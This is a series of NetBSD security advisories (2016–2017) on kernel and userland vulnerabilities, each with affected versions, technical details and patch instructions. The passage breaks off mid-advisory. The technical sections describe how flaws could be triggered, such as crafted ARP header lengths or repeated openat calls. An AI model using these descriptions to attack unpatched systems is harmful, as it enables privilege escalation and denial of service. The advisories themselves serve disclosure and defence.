-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2017-006 = Topic: Vnode reference leak in the openat system call Version:NetBSD-current: source prior to Sun, July 9th 2017 NetBSD 8.0 beta:affected NetBSD 7.1: affected NetBSD 7.0 - 7.0.2: affected NetBSD 6.1 - 6.1.4: not affected NetBSD 6.0 - 6.0.5: not affected Severity: Local privilege escalation Fixed: NetBSD-current: Sun, July 9th 2017 NetBSD-8 branch:Mon, July 10th 2017 NetBSD-7-1 branch: Mon, July 10th 2017 NetBSD-7-0 branch: Mon, July 10th 2017 NetBSD-7 branch:Mon, July 10th 2017 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 6.0 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract An easily exercisable error path in the kernel leaves behind an unreclaimed reference to a vnode. This prevents unmounting the affected volume, allowing local denial of service. It is likely that tickling the weakness repeatedly can be used to corrupt the kernel heap and thus gain kernel-level privileges, even with securelevel enabled. Technical Details = When calling the openat system call using a file descriptor that does not name a directory as the starting point for path lookup, a reference to the underlying vnode is taken temporarily and then not released when the error is discovered. Performing such a call often enough results in overflowing the internal reference count and corrupting the kernel heap. Solutions and Workarounds = For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarise how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), KERNCONF with the name of your kernel configuration file and VERSION with the file version below File versions containing the fixes: FILE HEAD netbsd-8 netbsd-7 netbsd-7-1 netbsd-7-0 -- -- sys/kern/vfs_lookup.c 1.208 1.207.2.1 1.201.4.1 1.201.12.1 1.201.8.1 To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P -r VERSION sys/kern/vfs_lookup.c # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd # shutdown -r now For more information on how to do this, see: http://www.NetBSD.org/guide/en/chap-kernel.html Thanks To = Mateusz Guzik for noticing the issue, and David A. Holland for deploying the fix. Revision History 2017-09-08 Initial release More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2017-00N.txt.asc Information about NetBSD and NetBSD security can be found at http://www.NetBSD.org/ and http://www.NetBSD.org/Security/ . Copyright 2017, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. -BEGIN PGP SIGNATURE- iQIcBAEBAgAGBQJZsqisAAoJEAZJc6xMSnBuu4AP/0ytQhuSMf1hjvg5Gdg9TT5N 4anruzy9VY6P4PqkPVjJTv7YYlOCTtP7Svg4+CbwIjRoNNyKycUhEmBzUWpmLQL1 UaKE44lJExbD1qIL4aU5LweD+RnGQbdo9LwMC31rK8dUSKCpkc6K7yt+TnA2SMw/ a2IlJtqkX5lk+HAQ3TF32STPz+oijtEJBFjTCzWw4uLpAbvvdephuzQRR4H3d324 3iD0pcLRblpOAZ7qeOG6iCcpemMxu33T2IphsNL1Sx2JyKmqObtyRoNU8O6V7ldP L1VGIAU5cNW6+zCbvKLyTKLbze5eRuGx5x/fLbHnjlodGrdshxzIqEUVUGyD+hJJ JP1pYo3Mj/BJwnjLhv8hNWyuX6VtnEgl0B5C2U7X2K5c05DZnRvSrSHrIiGjIEoV p7LvbgLXtIEdzpOrx4kZ5DoHAVAjBm0gLrVwK1r8nSgOPmEzLpzaC3fCCL/x4cfZ JfMJvA3QbQJOpNdOexDcr1eD7VUFpZE7mE6kI8UUCpF71446A3cGpMkftSt/i6vn htDCqnmYJ10w2NtRc99VGIdgUZUM7d3as83HGKrHcTous0qKyutrB+WlEpGHIRY5 mq7gCoRqikbxBKhnYlADGJRXTk9FBw2ai08SIOsRW7SSlVNwtPq09xhT0X6NsKA0 IsQfy4QZa1g+ecssqDHg =5ckQ -END PGP SIGNATURE-
NetBSD Security Advisory 2017-005: x86: vulnerabilities in context handling
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2017-005 = Topic: x86: vulnerabilities in context handling Version:NetBSD-current: source prior to Sun, Jul 1st 2017 NetBSD 7.1: affected NetBSD 7.0 - 7.0.2: affected NetBSD 6.1 - 6.1.4: affected NetBSD 6.0 - 6.0.5: affected Severity: Privilege escalation / Local DoS Fixed: NetBSD-current: Sun, Jul 1st 2017 NetBSD-7-1 branch: Thu, Jul 20th 2017 NetBSD-7-0 branch: Thu, Jul 20th 2017 NetBSD-7 branch:Thu, Jul 20th 2017 NetBSD-6-1 branch: Tue, Aug 8th 2017 NetBSD-6-0 branch: Tue, Aug 8th 2017 NetBSD-6 branch:Tue, Aug 8th 2017 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 6.0 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract Three issues were discovered in the i386 and amd64 ports of NetBSD: 1) A missing check in the trap handler could allow userland to panic an i386 kernel. 2) A race condition could allow userland to panic an i386 kernel, and escalate privileges on amd64. 3) A missing check in the Linux compatibility layer could allow userland to exploit the Intel Sysret Vulnerability on amd64. Technical Details = 1) Under certain circumstances, userland can legitimately make the kernel generate a stack fault when executing 'iret'. However, in the trap handler, the appropriate check was missing, and this fault could lead to a panic. 2) The same call gate existed on i386 and amd64 that allowed binaries from previous releases to perform syscalls. However, call gates do not automatically disable interrupts when entering the target function. Therefore, there was a condition where the kernel would be executed with userland registers loaded and interrupts enabled, which breaks a certain number of assumptions in the i386 and amd64 implementations. On i386 this can lead to a panic, and on amd64 to a privilege escalation. 3) A missing check in the trap frame could allow userland to have the kernel execute 'sysret' with a fully-controllable %rip, thereby allowing the exploitation of the Intel Sysret Vulnerability (see NetBSD-SA2012-003). Solutions and Workarounds = For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarise how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), KERNCONF with the name of your kernel configuration file and VERSION with the file version below File versions containing the fixes: FILE HEAD netbsd-7 netbsd-7-0 netbsd-7-1 -- -- sys/arch/i386/i386/trap.c 1.2881.272.4.21.272.6.2 1.272.10.2 sys/arch/i386/i386/locore.S 1.1461.112.4.11.112.6.1 1.112.10.1 sys/arch/i386/i386/machdep.c 1.7831.752.4.11.752.8.1 1.752.12.1 sys/arch/amd64/amd64/trap.c 1.96 1.78.4.3 1.78.6.3 1.78.10.3 sys/arch/amd64/amd64/locore.S 1.1241.76.2.2 1.76.4.2 1.76.8.2 sys/arch/amd64/amd64/machdep.c 1.2541.211.2.11.211.6.1 1.211.10.1 sys/compat/linux/arch/amd64/linux_machdep.c 1.51 1.48.4.1 1.48.8.1 1.48.4.1 FILE netbsd-6 netbsd-6-0 netbsd-6-1 -- -- sys/arch/i386/i386/trap.c 1.262.8.21.262.12.2 1.262.14.2 sys/arch/i386/i386/locore.S 1.95.10.41.95.10.2.4.1 1.95.10.3.2.1 sys/arch/i386/i386/machdep.c 1.717.2.81.717.2.7.4.1 1.717.2.7.6.1 sys/arch/amd64/amd64/trap.c 1.69.2.3 1.69.2.1.4.2 1.69.2.1.6.2 sys/arch/amd64/amd64/locore.S 1.66.2.2 1.66.2.1.4.1 1.66.2.1.6.1 sys/arch/amd64/amd64/machdep.c 1.175.2.91.175.2.7.2.2 1.175.2.8.2.1 sys/compat/linux/arch/amd64/linux_machdep.c 1.39.6.1 1.39.10.1 1.39.12.1 To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P -r VERSION sys/arch/i386/i386/trap.c # cvs update -d -P -r VERSION sys/arch/i386/i386/locore.S # cvs update -d -P -r VERSION sys/arch/i386/i386/machdep.c # cvs update -d -P -r VERSION sys/arch/amd64/amd64/trap.c # cvs update -d -P -r VERSION
NetBSD Security Advisory 2017-004: buffer overflow via cmap for 4 graphics drivers
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2017-004 = Topic: buffer overflow via cmap for 4 graphics drivers Version:NetBSD-current: source prior to June 13th NetBSD 8.0_BETA:affected NetBSD 7.1: affected NetBSD 7.0 - 7.0.2: affected NetBSD 6.1 - 6.1.5: affected NetBSD 6.0 - 6.0.6: affected Severity: information leak and potential root compromise for authenticated user on affected graphics console Fixed: NetBSD-current: June 13th NetBSD-8 branch:June 15th NetBSD-7-1 branch: June 15th NetBSD-7-0 branch: June 15th NetBSD-7 branch:June 15th NetBSD-6-0 branch: June 15th NetBSD-6-1 branch: June 15th NetBSD-6 branch:June 15th Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 6.0 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract An authenticated user on a wscons terminal with the following graphics drivers: sbd (ews4800mips) bivideo (hpcsh) sti (hppa and hp300) pm (pmax) could cause a buffer overflow when reading or writing the color map. Technical Details = Due to overflowable bounds checking when reading or writing the color map using the WSDISPLAYIO_GETCMAP and WSDISPLAYIO_PUTCMAP ioctls, the user that owns a /dev/ttyE* (i.e. is logged in on it) could read kernel memory, or for all but bivideo, which doesn't have a writable color map, write kernel memory. Solutions and Workarounds = Solution: update the kernel with one built from source past the fix date. There are no workarounds besides the obvious not allowing untrusted users at the console. Affected source files fix versions + HEAD ++ -8 ++ sys/arch/ews4800mips/sbd/fb_sbdio.c 1.16 1.15.10.1 sys/arch/pmax/ibus/pm.c 1.13 1.12.22.1 sys/dev/hpc/bivideo.c 1.34 1.33.30.1 sys/dev/ic/sti.c 1.19 1.18.20.1 ++ -7 +++ -7-1 + -7-0 + sys/arch/ews4800mips/sbd/fb_sbdio.c 1.13.4.2 1.13.4.1.6.1 1.13.4.1.2.1 sys/arch/pmax/ibus/pm.c 1.12.4.1 1.12.16.1 1.12.8.1 sys/dev/hpc/bivideo.c11.33.12.1 1.33.24.1 1.33.16.1 sys/dev/ic/sti.c 1.18.2.1 1.18.14.1 1.18.6.1 ++ -6 +++ -6-1 + -6-0 + sys/arch/ews4800mips/sbd/fb_sbdio.c 1.12.2.1 1.12.16.1 1.12.8.1 sys/arch/pmax/ibus/pm.c 1.11.2.1 1.11.16.1 1.11.8.1 sys/dev/hpc/bivideo.c 1.32.14.1 1.32.22.1 1.32.20.1 sys/dev/ic/sti.c 1.16.8.2 1.16.22.1 1.16.14.1 Thanks To = Thanks to CTurt for reporting this set of issues. Revision History 2017-09-08 Initial release More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2017-004.txt.asc Information about NetBSD and NetBSD security can be found at http://www.NetBSD.org/ and http://www.NetBSD.org/Security/ . Copyright 2015, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. $NetBSD: NetBSD-SA2017-004.txt,v 1.1 2017/09/08 14:16:20 christos Exp $ -BEGIN PGP SIGNATURE- iQIcBAEBAgAGBQJZsqZUAAoJEAZJc6xMSnBulOkP+QHLJsIE+54s6iAc9p45tnT7 mLVFvATsLyb4Vu4BJ82swC0AJqpHTjUBQgAmYR+C6xHzewyd95Uimgb5C6hnpXb9 f7EcZ/9AiQzVusEp4EfjyBJB5bze9W4tbZOfLNJ41kZyoUAlg2gQdd70Oz4lW5CQ 6ENcYqXgoUqsLA2MF8lcFhAbuTaBY9vzbQOAfviGtguTCmoEZ9ZcknAnNO0G+0Kk RCnu/P333Z0X7m/vHMQ9YJQyHjSGQFii0Ssyl+FgKQw3Qdhs+SRGE7XhEDjDTBGU dm25XrdDcRFrW0YlCnEInXqMHvrjtPAfwZ9glRElgXgcU3tld1Gynz6e3u1SmL2C 76G3ZlDabovJNLRs4GOcAofEsUN4KWBxemOUFPzuMx0vM6yv+r71+DdcFYVIRgrl 6KgoqvcTGL6n2MphLKy4+dBytuIue83RSqNNhdliTLmlRy/jUWOXGWXanOjaGv/E bYKTeELHZ5uDzi4HZ6nO9qjazskUz3+CvbSmJmzDTa+FNYAbiuNHzW9jUD2wk8TE GP2bEh0lF8Sw1FY8TRKPUldr5s/STbdAGjISC/128AuT6a2S+bq+zIidIOMa4FhP etzb43qjA41t5FG01tTUW3SDmI6s1svyhzSYySFF6HsbJ2roF9zS8DFtk09pwa/k WwGwp4kZJGaJPRNplTkB =m2H9 -END PGP SIGNATURE-
NetBSD Security Advisory 2017-002: Several vulnerabilities in ARP
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2017-002 = Topic: Several vulnerabilities in ARP Version:NetBSD-current: source prior to Tue, Jan 24th 2017 NetBSD 7.0 - 7.0.2: affected NetBSD 6.1 - 6.1.4: affected NetBSD 6.0 - 6.0.5: affected Severity: Remote DoS, remote information disclosure Fixed: NetBSD-current: Tue, Jan 24th 2017 NetBSD-7-0 branch: Sun, Feb 5th 2017 NetBSD-7 branch:Sun, Feb 5th 2017 NetBSD-6-0 branch: Sun, Feb 5th 2017 NetBSD-6-1 branch: Sun, Feb 5th 2017 NetBSD-6 branch:Sun, Feb 5th 2017 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 6.0 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract Two vulnerabilities were found in NetBSD's ARP implementation: - A memory leak could allow an attacker to remotely cause the system to run out of memory and eventually panic. - Missing validation checks on a received ARP packet header could cause the system to reply with uninitialized kernel data which may lead to information disclosure. Technical Details = - When replying to an ARP request, a particular branch taken in the output code did not free the mbuf that was being sent. An attacker could send specially-crafted ARP requests that trigger this memory leak. - When processing a received ARP request, the system did not properly check the hardware and protocol lengths in the ARP header. These fields being used to reply to the request in memcpys, an attacker could send an ARP packet with the highest encodable lengths and cause the kernel to copy in the reply packet more data than is available. It has been demonstrated that a remote machine can thereby retrieve 249 bytes of kernel memory over an Ethernet link. Solutions and Workarounds = For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarise how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), KERNCONF with the name of your kernel configuration file and VERSION with the file version below File versions containing the fixes: FILE HEAD netbsd-7 netbsd-7-0netbsd-6 netbsd-6-1netbsd-6-0 -- ---- sys/netinet/if_arp.c 1.239 1.158.2.2 1.158.4.1 1.154.2.3 1.154.16.21.154.8.2 sys/net/if_arcsubr.c 1.76 1.66.2.1 1.66.6.1 1.63.14.2 1.63.14.1.2.1 1.63.20.1 sys/net/if_ecosubr.c 1.50 1.40.2.2 1.40.2.1.2.1 1.36.4.2 1.36.18.1 1.36.10.1 sys/net/if_ethersubr.c 1.236 1.204.2.1 1.204.4.1 1.188.8.5 1.188.8.3.2.2 1.188.8.2.4.2 sys/net/if_fddisubr.c 1.104 1.88.2.1 1.88.6.1 1.81.14.2 1.81.14.1.2.1 1.81.20.1 sys/net/if_tokensubr.c 1.81 1.65.2.1 1.65.4.1 1.61.8.1 1.61.18.1 1.61.14.1 To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P -r VERSION sys/netinet/if_arp.c # cvs update -d -P -r VERSION sys/net/if_arcsubr.c # cvs update -d -P -r VERSION sys/net/if_ecosubr.c # cvs update -d -P -r VERSION sys/net/if_ethersubr.c # cvs update -d -P -r VERSION sys/net/if_fddisubr.c # cvs update -d -P -r VERSION sys/net/if_tokensubr.c # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd # shutdown -r now For more information on how to do this, see: http://www.NetBSD.org/guide/en/chap-kernel.html Thanks To = Maxime Villard for finding the issues and writing fixes. Revision History 2017-02-17 Initial release More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2017-002.txt.asc Information about NetBSD and NetBSD security can be found at http://www.NetBSD.org/ and http://www.NetBSD.org/Security/ . Copyright 2017, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. -BEGIN PGP SIGNATURE- iQIcBAEBAgAGBQJYp0fRAAoJEAZJc6xMSnBuPH4P/3/uA1dSrmvpZzz3lx/l3OoJ t/XC1ueebICOpwsjYcabydjDRH/TciolYQA9mfJyuIxVj6Ie5GKjsUjy20lD3Et7 6PQf2Ijdx5Ek0fL8Tnfs76HVtC/mjAKTP6pW2Gw9JoVlWAZ2TmDeFJWwGFIlMQs1
NetBSD Security Advisory 2017-001: Memory leak in the connect system call
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2017-001 = Topic: Memory leak in the connect system call Version:NetBSD-current: source prior to Sun, Oct 31st 2016 NetBSD 7.0 - 7.0.2: affected NetBSD 6.1 - 6.1.4: affected NetBSD 6.0 - 6.0.5: affected Severity: Local DoS Fixed: NetBSD-current: Sun, Oct 31st 2016 NetBSD-7-0 branch: Tue, Nov 1st 2016 NetBSD-7 branch:Tue, Nov 1st 2016 NetBSD-6-0 branch: Fri, Nov 11th 2016 NetBSD-6-1 branch: Fri, Nov 11th 2016 NetBSD-6 branch:Fri, Nov 11th 2016 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 6.0 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract A memory leak in the kernel could allow a local user to use up kernel memory via repeated calls to the connect system call, and thus to freeze - or eventually panic - the system. Technical Details = When calling the connect system call on a particular file descriptor with specific arguments, a kernel buffer allocated to temporarily hold a path buffer was not freed. Performing such a call in a loop would cause the kernel to run out of memory and eventually panic. Solutions and Workarounds = For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarise how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), KERNCONF with the name of your kernel configuration file and VERSION with the file version below File versions containing the fixes: FILE HEAD netbsd-7 netbsd-7-0netbsd-6 netbsd-6-1netbsd-6-0 -- ---- sys/kern/uipc_usrreq.c 1.181 1.169.2.4 1.169.2.3.2.1 1.136.8.4 1.136.8.3.2.1 1.136.8.2.2.1 To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P -r VERSION sys/kern/uipc_usrreq.c # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd # shutdown -r now For more information on how to do this, see: http://www.NetBSD.org/guide/en/chap-kernel.html Thanks To = The Mootja Analysis Engine for detecting the issue, Maxime Villard for developing it and writing a fix. Revision History 2017-01-21 Initial release More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2017-001.txt.asc Information about NetBSD and NetBSD security can be found at http://www.NetBSD.org/ and http://www.NetBSD.org/Security/ . Copyright 2017, The NetBSD Foundation, Inc. All Rights Reserved. Redistribution permitted only in full, unmodified form. -BEGIN PGP SIGNATURE- Version: GnuPG v1 iQIcBAEBAgAGBQJYg41BAAoJEAZJc6xMSnBuFzYQALY+MeClp85wpGhLmxBOoVzQ drDRSoosEZJG1n5yqUuyvAka2KYYCIfMIw2JH7chvf0bDRZnwl32IJJYLzLvFPwf CVZibK990zSBxdiVQ9eOEr5K3RM/V4abxpa+3AYxPOyTwLpR0OMHhfI0pJ5eTo7X hBWrY9pjSU/To5EjMEBMc6SnuGs+LnW1o2TUyT/UbrvBO6Zs8gBuk7mIhxy0xK5f 39eZAwPvS1BF28NnFgesrw4gd5RwzKUYXcTVcHuGGCszcyejjmepumbV8aLL+/zw CetkXw8WMjM6YuPM9DEOCBDkYMElSAakkPATagK+25Agi81/HI2VNMwvER9Qinqk VKy9+rlXNlxa3D9qCSYfRrn40xdQ6PSZfRCvG2KEGfF40wplH5dHZsRkmvMzt8kY D+03F0eiifWnUVgdLhEYJQeGFoBkElIA20bH/NGhm0W/Rm3etxe0MQiW7lqzrOny G3YW0hxrp/YOnxDJmn35VKshq7iUY5clko3rfy7XF1VEsz5dTGrJsGwPKe7B5ZIj +Y4+p38KbfEACS0PLZVfEkSSd9eONwf31jp8e8rJAn9dGKLy/r8eQoFOIm61iPXJ g00YtgfE/CI2Z9PLF00V+vV4hlr4v4PJvMshF3SY9CSpuqTC/A9a01nDEIZs9Y5d nyZv4WFb3sTpLx5JzUEP =uCbX -END PGP SIGNATURE-
NetBSD Security Advisory 2016-005: bozohttpd CGI handlers potential remote code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2016-005 = Topic: bozohttpd CGI handlers potential remote code execution Version:NetBSD-current: 20160415 NetBSD 7.0: affected NetBSD 6.1 - 6.1.5: affected NetBSD 6.0 - 6.0.6: affected Severity: Potential execution of arbitrary commands as httpd user Fixed: NetBSD-current: April 15, 2016 NetBSD-7 branch:April 15, 2016 NetBSD-6 branch:April 15, 2016 NetBSD-6-1 branch: April 15, 2016 NetBSD-6-0 branch: April 15, 2016 pkgsrc: bozohttpd-20160415 corrects this issue Please note that NetBSD releases prior to 6.0 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract Running programs as CGI handlers that were not designed to serve as such may create a vulnerability since bozohttpd would pass any arguments to the executed binary. In the worst case scenario this may lead to remote code execution. This vulnerability has been assigned CVE-2015-8212. Technical Details = bozohttpd supports option -C which can be used to add a CGI handler for a particular file type. It was designed to support both CGI and non-CGI aware programs to serve dynamic content. Binaries were executed using arguments from the remote client. In case of non-CGI programs this can be abused to exploit features of such programs and change their behaviour, which in worst case scenario can lead to running attacker-provided code. It was proven that arbitrary code can be executed in case of PHP-CLI as CGI handler. Solutions and Workarounds = This problem only affects users which use not-CGI aware programs as CGI handlers (such as sh, CLI version of PHP etc.) directly. The simplest fix is to install the latest pkgsrc bozohttpd which fixes this problem (and run it instead of the system one). Support for non-CGI handlers has been removed as there's no way to securely handle user's requests. cd /var/tmp ftp http://nyftp.netbsd.org/pub/NetBSD-dailybinary/sets/base.tgz cd / tar xzpf /var/tmp/base.tgz ./usr/libexec/httpd with the following replacements: = the release version you are using = the source date of the build. 20160416* and later will fit = your system's architecture The following instructions describe how to upgrade your bozohttpd binaries by updating your source tree and rebuilding and installing a new version of bozohttpd. The following instructions describe how to upgrade your bozohttpd binary by updating your source tree and rebuilding and installing a new version of bozohttpd. * NetBSD-current: Systems running NetBSD-current dated from before 2016-04-15 should be upgraded to NetBSD-current dated 2016-04-16 or later. The following files/directories need to be updated from the netbsd-current CVS branch (aka HEAD): src/libexec/httpd To update from CVS, re-build, and re-install bozohttpd: # cd src # cvs update -d -P libexec/httpd # cd libexec/httpd # make USETOOLS=no cleandir dependall # make USETOOLS=no install * NetBSD 7.*: Systems running NetBSD 7.* sources dated from before 2016-04-15 should be upgraded from NetBSD 7.* sources dated 2016-04-16 or later. The following files/directories need to be updated from the netbsd-7, netbsd-7-0 branches: src/libexec/httpd To update from CVS, re-build, and re-install bozohttpd: # cd src # cvs update -r -d -P libexec/httpd # cd libexec/httpd # make USETOOLS=no cleandir dependall # make USETOOLS=no install * NetBSD 6.*: Systems running NetBSD 6.* sources dated from before 2016-04-15 should be upgraded from NetBSD 6.* sources dated 2016-04-16 or later. The following files/directories need to be updated from the netbsd-6, netbsd-6-1 or netbsd-6-0 branches: src/libexec/httpd To update from CVS, re-build, and re-install bozohttpd: # cd src # cvs update -r -d -P libexec/httpd # cd libexec/httpd # make USETOOLS=no cleandir dependall # make USETOOLS=no install Thanks To = Thanks go to Mateusz Kocielski who found this problem and supplied the fixes. Revision History 2016-04-21 Initial release More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be
NetBSD Security Advisory 2016-004: Multiple vulnerabilities in the compatibility layers
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2016-004 = Topic: Multiple vulnerabilities in the compatibility layers Version:NetBSD current: source prior to Sat, Aug 8th 2015 NetBSD 7.0: affected NetBSD 6.1 - 6.1.4: affected NetBSD 6.0 - 6.0.5: affected Severity: Local DoS / Kernel execution redirection Fixed: NetBSD-current: Sat, Aug 8th 2015 NetBSD-7.0: source prior to Sun, Aug 2nd 2015 NetBSD-6-0 branch: source prior to Thu, Apr 21st 2016 NetBSD-6-1 branch: source prior to Thu, Apr 21st 2016 NetBSD-6 branch:source prior to Thu, Apr 21st 2016 Teeny versions released later than the fix date will contain the fix. Please note that NetBSD releases prior to 6.0 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract Several compatibility layers are affected by several vulnerabilities: 1) NetBSD 32bit compatibility: Memory leak in sendmsg 2) NetBSD 32bit compatibility: Buffer Overflow in ioctl 3) Digital UNIX (formerly OSF/1) compatibility: Zero-sized memory allocation Each of them allows a local user to crash the system. Technical Details = For more clarity the layers affected will be referred to as COMPAT_xx, where xx is the emulated system. 1) A memory leak COMPAT_NETBSD32's sendmsg system call could allow a local unprivileged user to make the kernel run out of memory, and eventually panic. 2) An inverted logic in COMPAT_NETBSD32's ioctl system call could allow a local unprivileged user to control the size given to a memcpy on the kernel side, thereby allowing that user to overwrite kernel heap. 3) Due to a missing input validation check in COMPAT_OSF1's sendmsg system call, a user could cause the kernel to perform a zero-sized memory allocation, resulting in a crash. Solutions and Workarounds = - - Disable the compability modules - - You can achieve this with the modunload(8) tool. Please read the appropriate manual page. For example, you can disable the Linux modules by moving the kernel object files out of the way. These are located in: /stand/${MACHINE_ARCH}/${KERNEL_VERSION}/modules/compat_${NAME}/compat_${NAME}.kmod And running the following command to unload them: # modunload compat_${NAME} The modules have dependencies, so you need to unload them in the proper order. You can also disable these modules by rebuilding your kernel without the COMPAT_${NAME} options. Note however that it is to be considered as a temporary workaround, and you are strongly advised to fix your system from source. - - Fix from source - - For all NetBSD versions, you need to obtain fixed kernel sources, rebuild and install the new kernel, and reboot the system. The fixed source may be obtained from the NetBSD CVS repository. The following instructions briefly summarise how to upgrade your kernel. In these instructions, replace: ARCH with your architecture (from uname -m), KERNCONF with the name of your kernel configuration file and VERSION with the file version below File versions containing the fixes: FILE HEAD netbsd-7 netbsd-6 netbsd-6-1 netbsd-6-0 - -- src/sys/compat/netbsd32/netbsd32_socket.c 1.42 1.41.14.1 1.39.2.3 1.39.2.2.6.1 1.39.2.2.4.1 src/sys/compat/netbsd32/netbsd32_ioctl.c 1.82 1.69.4.1 1.64.8.2 1.64.14.11.64.12.1 src/sys/compat/osf1/osf1_socket.c 1.21 N/A 1.20.14.1 1.20.28.11.20.20.1 To update from CVS, re-build, and re-install the kernel: # cd src # cvs update -d -P -r VERSION sys/compat/netbsd32/netbsd32_socket.c # cvs update -d -P -r VERSION sys/compat/netbsd32/netbsd32_ioctl.c # cvs update -d -P -r VERSION sys/compat/osf1/osf1_socket.c # ./build.sh kernel=KERNCONF # mv /netbsd /netbsd.old # cp sys/arch/ARCH/compile/obj/KERNCONF/netbsd /netbsd # shutdown -r now For more information on how to do this, see: http://www.NetBSD.org/guide/en/chap-kernel.html Thanks To = Thanks to Maxime Villard for finding and fixing these issues. Revision History 2016-04-21 Initial release More Information Advisories may be updated as new information becomes available. The most recent version of this advisory (PGP signed) can be found at http://ftp.NetBSD.org/pub/NetBSD/security/advisories/NetBSD-SA2016-004.txt.asc Information about NetBSD and NetBSD security can be found at http://www.NetBSD.org/ and
NetBSD Security Advisory 2016-003: Privilege escalation in calendar(1)
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 NetBSD Security Advisory 2016-003 = Topic: Privilege escalation in calendar(1) Version:NetBSD-current: source prior to Wed, Jul 1st 2015 NetBSD 7.0: not affected NetBSD 6.1 - 6.1.5: affected NetBSD 6.0 - 6.0.6: affected NetBSD 5.2 - 5.2.3: affected NetBSD 5.1 - 5.1.5: affected Severity: Local privilege escalation Fixed: NetBSD-current: Jul 1st, 2015 NetBSD-7 branch:Jul 1st, 2015 NetBSD-7-0 branch: Jul 1st, 2015 NetBSD-6 branch:Jul 1st, 2015 NetBSD-6-1 branch: Jul 1st, 2015 NetBSD-6-0 branch: Jul 1st, 2015 NetBSD-5 branch:Jul 1st, 2015 NetBSD-5-2 branch: Jul 1st, 2015 NetBSD-5-1 branch: Jul 1st, 2015 Please note that NetBSD releases prior to 5.1 are no longer supported. It is recommended that all users upgrade to a supported release. Abstract calendar(1) is a utility to process text files and displays lines that match certain dates. The -a flag which is used to process the default calendar files of all users and mails them the results. This flag requires super-user privileges which are not dropped properly when executing external programs. calendar(1) with -a option is executed by daily(5) maintenance script. Technical Details = calendar(1) requires super-user privileges in order to process calendar files of each user. When processing particular account, code is dropping its privileges incorrectly. The code changes only effective uid (euid) and effective gid (egid) of running process, and executes external programs such as cpp(1) and sendmail(1). This can be potentially used to escalate attacker privileges or process files which are readable by super-user only. Additionally, initgroups(3) call was missing. Thus, any supplementary groups in effect when it is started are also exposed. Solutions and Workarounds = Workaround - -- Set run_calendar=NO in daily.conf(5) in order to prevent invoking calendar(1) by daily(5) maintenance script. Solution - 1.) Binary update of affected versions (root is required to extract): To apply a fixed version from a releng build, fetch a matching base.tgz from nyftp.netbsd.org and extract the fixed binaries: # cd /var/tmp # ftp http://nyftp.netbsd.org/pub/NetBSD-daily/REL/BUILD/ARCH/binary/sets/base.tgz # cd / # tar xzpf /var/tmp/base.tgz /usr/bin/calendar with the following replacements: REL = the branch version you are using (e.g., netbsd-7-0, netbsd-6-1) [Note: netbsd-X represents the current _STABLE branch. Run "uname -v" to view which version you are updating. (e.g. netbsd-6 = 6.1_STABLE) You would use netbsd-X if you have _STABLE in your uname version.] BUILD = the source date of the build. 20150702Z and later will fix ARCH = your system's architecture (e.g., i386, amd64, alpha) (e.g., /netbsd-7-0/20151120Z/amd64/) 2.) Source update of affected versions (root is 